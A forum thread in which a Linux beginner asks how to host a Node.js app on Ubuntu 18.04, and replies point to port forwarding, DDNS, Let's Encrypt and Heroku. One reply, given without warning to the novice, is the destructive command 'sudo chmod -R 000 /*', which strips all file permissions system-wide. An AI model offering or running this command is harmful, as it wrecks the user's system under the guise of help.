Setting up Ubuntu 18.04 as a web hosting server

Hey everyone, I'm running Ubuntu 18.04 LTS and I wanted to setup my machine as a web hosting server to host a Node.js application, I already have the app done and it's running on localhost port 3000 just fine, and I bought a domain this morning, so IDK what's the best approach to take on this, I searched online for a while but couldn't find anything good cause IDK exactly what I need to start, cause it's my first time doing this and it's my first time installing linux without a VM (still a linux beginner), so it would be great if you just can guide me on how to start this or you can suggest a good article to get me started.

Thanks in advance.

This has nothing to do with Linux, you need to learn how to set up ddns on your modem and use port forwarding. If you already have a domain you should follow the domain provider's instructions.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Basically installing Linux on bare metal works exactely as in a VM. On the software side of things, as @Sauron already mentioned, it is more about learning how routing traffic through the internet works, what dynamic IP adresses are and how to set up your home network to allow your server to be reached without exposing your entire home network to the internet.

One note regarding security: Whenever you have a machine directely reachable from the internet, you'll want to make sure to use traffic encryption whenever possible (take a look at "Let's Encrypt") and to always keep your software up to date (preferably by updating the software automatically every 24h or so via a so-called cron job).

Apart from that, just search for something like "setting up server on Ubuntu 18.04" and you should find plenty of tutorials.

Good luck and enjoy playing around with your server :)

I would personally throw it on heroku free tier so you don't have to manage the server as well as the app. 

¸„»°'´¸„»°'´ Vorticalbox `'°«„¸`'°«„¸
`'°«„¸¸„»°'´¸„»°'´`'°«„¸Scientia Potentia est  ¸„»°'´`'°«„¸`'°«„¸¸„»°'´

-= Topic Moved to Networking =-

As mentioned this is more of a Networking issue/dilemma.

COMMUNITY STANDARDS   |   TECH NEWS POSTING GUIDELINES   |   FORUM STAFF

LTT Folding Users Tips, Tricks and FAQ   |   F@H & BOINC Badge Request   |   F@H Contribution    My Rig   |   Project Steamroller

I am a Moderator, but I am fallible. Discuss or debate with me as you will but please do not argue with me as that will get us nowhere.

Spoiler

Character is like a Tree and Reputation like its Shadow. The Shadow is what we think of it; The Tree is the Real thing.  ~ Abraham Lincoln

Reputation is a Lifetime to create but seconds to destroy.

You have enemies? Good. That means you've stood up for something, sometime in your life.  ~ Winston Churchill

Docendo discimus - "to teach is to learn"

CHRISTIAN MEMBER